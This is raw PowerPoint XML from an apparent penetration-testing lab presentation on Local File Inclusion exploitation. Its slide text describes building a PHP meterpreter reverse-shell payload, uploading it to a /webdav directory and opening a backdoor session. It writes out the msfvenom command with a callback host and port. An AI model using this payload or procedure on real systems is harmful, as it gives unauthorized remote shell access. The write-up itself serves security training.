          <a:ln w="12700" cmpd="dbl">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72014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kumimoji="0" lang="en-AU" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-AU" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>LFI (Local File Inclusion)</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>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3228956" y="887902"/>
            <a:ext cx="533372" cy="533481"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695452"/>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66;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{399EBA60-0884-4130-B096-695FDE4F5A3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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14</a:t>
            </a:fld>
            <a:endParaRPr sz="600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Google Shape;1113;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C230F4D-0EF4-4CF1-BEF5-697ACA09E9B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</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100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> to create a custom payload (shell.php). </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100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I then used Metasploit to build a Reverse Shell (Backdoor) and ultimately start a meterpreter session trough implanting the shell.php into the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> directory via the Network-File Manager and activating it via the web server with a simple double click on the file.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs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kumimoji="0" lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs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200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Commands</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200" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Refer to screenshots</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1200" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Google Shape;1113;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{540E7F97-A8D5-411F-AAD3-CB979960045B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460293" y="1421383"/>
            <a:ext cx="2371500" cy="3154200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="18287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200" b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</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200" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I successfully created the custom shell.php file which I implanted into the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> directory on the web server, upon activation I created a interactive shell (Backdoor) which gave me access to root directories and other sensitive files.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Arrow: Down 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D62CD6D1-EEC1-4E8F-A909-F22B35D250C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7492642" y="3259803"/>
            <a:ext cx="555414" cy="8961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8176DA3A-CB4D-418E-BC8F-29FB04129C1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7180283" y="2571750"/>
            <a:ext cx="1239442" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Screenshots</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Google Shape;1111;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{618298F5-BF01-43D8-8C66-F044831D6F21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="4916488"/>
            <a:ext cx="7972425" cy="227012"/>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US" sz="1000" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203"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31;p63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCAF2359-1A9A-48B4-BBA1-DCD4C3225345}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="0"/>
            <a:ext cx="9169400" cy="5334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kumimoji="0" lang="en-AU" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-AU" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>LFI (Local File Inclusion)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-AU" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;1111;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D462506-B2E0-47D5-A659-8B211931A25D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="4916488"/>
            <a:ext cx="7972425" cy="227012"/>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US" sz="1000" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Google Shape;1135;p63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C4313AC-1892-4008-9E06-02E153A58349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Google Shape;1136;p63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8F5135-A109-4C0E-B5C5-C4941A668BE0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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3" name="Google Shape;1137;p63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4FEC7D3-1CA0-4B50-84CC-2F4A1CDEDB20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{818BC438-8297-4CEF-8190-495B24E9C0A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2138498" y="921650"/>
            <a:ext cx="4719027" cy="516765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDE53DBD-819B-4183-ACF0-9FE44E04D5A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2037013" y="620522"/>
            <a:ext cx="4921994" cy="267381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr"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100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>sfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –p php/meterpreter/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> LHOST=192.168.1.90 LPORT=4444 &gt; shell.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBFEF094-83FD-45E3-B2BF-8EC106AECBBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2443054" y="2133282"/>
            <a:ext cx="4109916" cy="2783206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D3A1064-EAF5-41F5-9445-ECAE34B09DBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1842164" y="1865901"/>
            <a:ext cx="5459672" cy="267381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr"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100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Metasploit configuration of reverse TCP (Backdoor) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>aussessfully</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> created shell session </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle: Rounded Corners 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BC7C429-1979-41D8-A222-BC16B0BB5895}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2457014" y="4793190"/>
            <a:ext cx="670094" cy="116318"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cmpd="dbl">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Rounded Corners 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3971DA22-9E45-46C9-917C-96739241047B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3120127" y="953906"/>
            <a:ext cx="3730417" cy="79157"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cmpd="dbl">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Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10B90888-AA6A-4516-A490-3DBEAE23B913}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97550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31;p63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCAF2359-1A9A-48B4-BBA1-DCD4C3225345}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="0"/>
            <a:ext cx="9169400" cy="5334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kumimoji="0" lang="en-AU" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
